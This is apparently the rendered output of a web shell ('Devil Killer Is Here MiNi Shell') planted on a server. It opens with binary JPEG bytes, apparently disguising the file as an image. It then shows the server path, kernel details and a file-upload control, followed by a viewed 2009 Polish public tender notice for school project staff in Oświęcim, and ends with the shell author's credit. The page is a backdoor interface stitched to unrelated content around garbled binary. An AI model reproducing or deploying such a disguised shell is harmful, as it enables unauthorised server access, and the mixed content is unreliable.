JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090917/159023-N-2009.html

<p class="kh_header"><b>Oświęcim: Pełnienie funkcji: kierownika projektu, asystenta projektu (4 os.), specjalisty ds.rozliczeń (4 os.) w związku z realizacją projektu: Z edukacją na TAK.</b><br>
<b>Numer ogłoszenia: 159023 - 2009; data zamieszczenia: 17.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Szkół i Przedszkoli Miejskich , ul. Królowej Jadwigi 12a, 32-602 Oświęcim, woj. małopolskie, tel. 033 8423963, faks 033 8422505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsipm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejska Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji: kierownika projektu, asystenta projektu (4 os.), specjalisty ds.rozliczeń (4 os.) w związku z realizacją projektu: Z edukacją na TAK..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres obowiązków dla zadania 1:
-	odpowiedzialność za merytoryczny postęp realizacji projektu,
-	koordynacja i nadzór na pracą zespołu projektowego
-	nadzór nad prawidłowa realizacja projektu w zakresie merytorycznym i finansowym oraz zgodnością z przyjętym harmonogramem, budżetem i planem działań,
-	koordynacja działań w projekcie
-	współpraca i nadzór nad działalnością podmiotów zaangażowanych w realizację projektu
-	organizowanie i podział zadań oraz ustalenie zakresu współpracy pomiędzy osobami lub jednostkami realizującymi projekt, zgodnie z procedurami ustalonymi przez instytucje wdrążająca oraz z wnioskiem o dofinansowanie projektu,
-	potwierdzanie wszelkich wydatków ujętych w harmonogramie projektu, nadzór nad dokumentacją finansową
-	współpraca z instytucjami zewnętrznymi w tym z Instytucją Wdrażającą
-	prowadzenie informacji i promocji wymaganej umową projektową,
-	informowanie Zamawiającego o przebiegu realizacji projektu i ewentualnych nieprawidłowościach związanych z jego realizacja.
-	być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu;
2.	Zakres obowiązków dla działania 2:
Realizacja projektu w jednym z wyznaczonych Gimnazjów objętych projektem a w szczególności:
-	sporządzanie sprawozdań finansowych (w zakresie wydatków dot. poszczególnych szkół)
-	sporządzanie wniosków o płatność w częściach dot. realizacji projektu (w zakresie wydatków dot. poszczególnych szkół) do 2-go dnia każdego  miesiąca, następującego po zakończeniu okresu rozliczeniowego,
-	raportowanie Kierownikowi Projektu i Księgowemu nt. postępu rzeczowego realizacji projektu, ewentualnych nieprawidłowościach odnoszących się do swojego zakresu obowiązków i związanych z realizacją projektu.
-	być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu

3.	Zakres obowiązków do zadania 3
Realizacja projektu w jednym z wyznaczonych Gimnazjów objętych projektem 	a w szczególności:
-	Prowadzenie Biura Projektu,
-	kontakty z BO
-	przeprowadzenie rekrutacji (w tym opracowanie formularzu zgłoszeniowego, regulaminu, umowy i wzorów oświadczeń- przy współpracy z kierownikiem projektu oraz pedagogiem szkolnym),
-	organizacja zajęć dydaktyczno-wyrównawczych i pozalekcyjnych oraz organizacja obozów językowych i wycieczek edukacyjnych,
-	raportowanie do Kierownika Projektu nt. postępu rzeczowego realizacji projektu, o ewentualnych nieprawidłowościach związanych z jego realizacją,
-	sporządzanie postępu rzeczowego do wniosku o płatność wraz z załącznikiem nr 1 i PEFS do 2-go dnia każdego miesiąca, następującego po zakończeniu okresu rozliczeniowego.
-	być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca ubiegający sie o zamówienie musi spełniać poniższe warunki :
1. Wykonawca musi spełnić warunki określone w art.22 ust.1 w związku
z postanowieniami art. 24 ustawy Prawo zamówień publicznych,
2. w przypadku Wykonawców wspólnie ubiegających sie o zamówienie np. konsorcja - ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (należy dołączyć do oferty prawidłowo sporządzone pełnomocnictwo lub umowę),
3. być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu w siedzibie biura projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu
4. Wykonawcy ubiegający się o zadanie 1 dodatkowo muszą spełniać następujące wymagania:
a) posiadać wykształcenie wyższe
b)  posiadać doświadczenie w zakresie czynności odpowiadających rodzajem i wartością przedmiotowi zamówienia w ramach projektów współfinansowanych z Europejskiego Funduszu Społecznego (wg załącznika nr 3 do SIWZ)
-	Za usługę odpowiadająca rodzajem usłudze stanowiącej przedmiot zamówienia, Zamawiający uzna pełnienie funkcji kierownika bądź koordynatora w projektach współfinansowanych z EFS  (w co najmniej w dwóch) z których wartość co najmniej 1 (jednego) wynosi nie mniej niż 200 000,00 PLN.
5. Wykonawcy ubiegający się o zadanie 2 dodatkowo muszą spełniać następujące wymagania:
a) wykształcenie wyższe kierunkowe: ekonomiczne
b) posiadać doświadczenie w pracy w księgowości na samodzielnym stanowisku - minimum 3 lata
6.  Wykonawcy ubiegający się o zadanie 3 dodatkowo muszą spełniać następujące wymagania:
a) Wykształcenie wyższe oraz ukończony kurs lub studia podyplomowe z zakresu problematyki związanej z zarządzaniem placówką oświatową
b) ukończone szkolenie o tematyce związanej z Europejskim Funduszem Społecznym
-	Wykonawca dołączy do oferty  kserokopię certyfikatu ukończenia szkolenia o tematyce związanej z Europejskim Funduszem Społecznym (potwierdzoną za zgodność z oryginałem przez Wykonawcę)
c) posiadać doświadczenie w zakresie projektów finansowanych ze środków zewnętrznych (wg załącznika nr 3 do SIWZ):.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenia i dokumenty wymagane od Wykonawcy:
1. oświadczenie, iż Wykonawca spełnia warunki udziału w postępowaniu określone
w art. 22 ust. 1 ustawy Prawo zamówień publicznych, zgodnie z załącznikiem 1B do
niniejszej SIWZ,
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,


Zamawiający przyjmie jako aktualne dokumenty, o których mowa powyżej, jeżeli ich data wydania lub potwierdzenia za zgodność ze stanem faktycznym przez wydającego dany dokument nie będzie wcześniejsza niż 6 miesięcy przed data składania ofert. W przypadku zaistnienia zmian, nie odzwierciedlonych w w/w dokumentach, Wykonawca obowiązany jest załączyć do oferty dokumenty będące podstawa tychże zmian  (uchwała wspólników, prawomocny wyrok sadowy).

3. Na potwierdzenie posiadanego wykształcenia Wykonawca dołącza do oferty:
-	Kserokopie (poświadczona za zgodność z oryginałem przez Wykonawcę) dokumentu, potwierdzającego posiadane wykształcenie i kwalifikacje,
4. Dla potwierdzenia posiadanego doświadczenia w zakresie czynności odpowiadających rodzajem i wartością przedmiotowi zamówienia Wykonawca dołącza:
-	Wykaz projektów w ramach których Wykonawca wykonywał lub wykonuje funkcje wymagane do poszczególnych zadań z podaniem - zgodnie z załącznikiem nr 3 do niniejszej SIWZ
-	Dokument/y potwierdzające pełnienie funkcji wymaganych do poszczególnych zadań np. oświadczenie, życiorys zawodowy, powołanie na dane stanowisko w projekcie.
5. Oświadczenie o dyspozycyjności w wymaganym przez Zamawiającego czasie,
6. Wykonawca będący osoba fizyczna nieprowadzący działalności gospodarczej do
oferty składa dodatkowo:
-	(poświadczona za zgodność z oryginałem przez Wykonawcę) kserokopie dowodu osobistego - w miejsce dokumentów o których mowa w pkt 8,
-	zgodę na przetwarzanie danych osobowych w zakresie niezbędnym do przeprowadzenia rekrutacji zgodnie z ustawa z dnia 29 sierpnia 1997r. o ochronie danych osobowych - (tekst jedn. Dz. U. 2002, Nr 101, poz. 926 z późn. zm.)

Wykonawca zagraniczny:

W przypadku Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zastosowanie ma przepis §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605 oraz . Dz.U.08.188.1155 ).

Dokumenty wymienione powyżej należy dostarczyć w oryginale lub wyraźnej, czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

Zamawiający żąda, aby dokumenty sporządzone w języku obcym były składane wraz
z tłumaczeniem ich na język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsipm.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Szkół i Przedszkoli Miejskich
ul. Królowej Jadwigi 12a
32-600 Oświęcim.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2009 godzina 10:30, miejsce: Zarząd Szkół i Przedszkoli Miejskich
ul. Królowej Jadwigi 12a
32-600 Oświęcim  sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Unii Europejskiej.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji kierownika projektu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zakres obowiązków dla zadania 1:
-	odpowiedzialność za merytoryczny postęp realizacji projektu,
-	koordynacja i nadzór na pracą zespołu projektowego
-	nadzór nad prawidłowa realizacja projektu w zakresie merytorycznym i finansowym oraz zgodnością z przyjętym harmonogramem, budżetem i planem działań,
-	koordynacja działań w projekcie
-	współpraca i nadzór nad działalnością podmiotów zaangażowanych w realizację projektu
-	organizowanie i podział zadań oraz ustalenie zakresu współpracy pomiędzy osobami lub jednostkami realizującymi projekt, zgodnie z procedurami ustalonymi przez instytucje wdrążająca oraz z wnioskiem o dofinansowanie projektu,
-	potwierdzanie wszelkich wydatków ujętych w harmonogramie projektu, nadzór nad dokumentacją finansową
-	współpraca z instytucjami zewnętrznymi w tym z Instytucją Wdrażającą
-	prowadzenie informacji i promocji wymaganej umową projektową,
-	informowanie Zamawiającego o przebiegu realizacji projektu i ewentualnych nieprawidłowościach związanych z jego realizacja.
-	być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji specjalisty ds. rozliczeń..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.	Zakres obowiązków dla działania 2 - (4 os. - po 1 osobie w każdym z Gimnazjów objętych projektem):
Realizacja projektu w jednym z wyznaczonych Gimnazjów objętych projektem a w szczególności:
-	sporządzanie sprawozdań finansowych (w zakresie wydatków dot. poszczególnych szkół)
-	sporządzanie wniosków o płatność w częściach dot. realizacji projektu (w zakresie wydatków dot. poszczególnych szkół) do 2-go dnia każdego  miesiąca, następującego po zakończeniu okresu rozliczeniowego,
-	raportowanie Kierownikowi Projektu i Księgowemu nt. postępu rzeczowego realizacji projektu, ewentualnych nieprawidłowościach odnoszących się do swojego zakresu obowiązków i związanych z realizacją projektu.
-	być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji asystenta projektu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.	Zakres obowiązków do zadania 3 - (4 os. - po 1 osobie w każdym z Gimnazjów objętych projektem):
Realizacja projektu w jednym z wyznaczonych Gimnazjów objętych projektem 	a w szczególności:
-	Prowadzenie Biura Projektu,
-	kontakty z BO
-	przeprowadzenie rekrutacji (w tym opracowanie formularzu zgłoszeniowego, regulaminu, umowy i wzorów oświadczeń- przy współpracy z kierownikiem projektu oraz pedagogiem szkolnym),
-	organizacja zajęć dydaktyczno-wyrównawczych i pozalekcyjnych oraz organizacja obozów językowych i wycieczek edukacyjnych,
-	raportowanie do Kierownika Projektu nt. postępu rzeczowego realizacji projektu, o ewentualnych nieprawidłowościach związanych z jego realizacją,
-	sporządzanie postępu rzeczowego do wniosku o płatność wraz z załącznikiem nr 1 i PEFS do 2-go dnia każdego miesiąca, następującego po zakończeniu okresu rozliczeniowego.
-	być dyspozycyjnym w godz. od 08:00 - 16:00 w dni robocze, w siedzibie biura projektu oraz w miejscach realizacji projektu (w zależności od potrzeb związanych z realizacją projektu) w okresie trwania projektu, na żądanie Zamawiającego w ciągu trzech godzin od otrzymania informacji od Kierownika Projektu.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com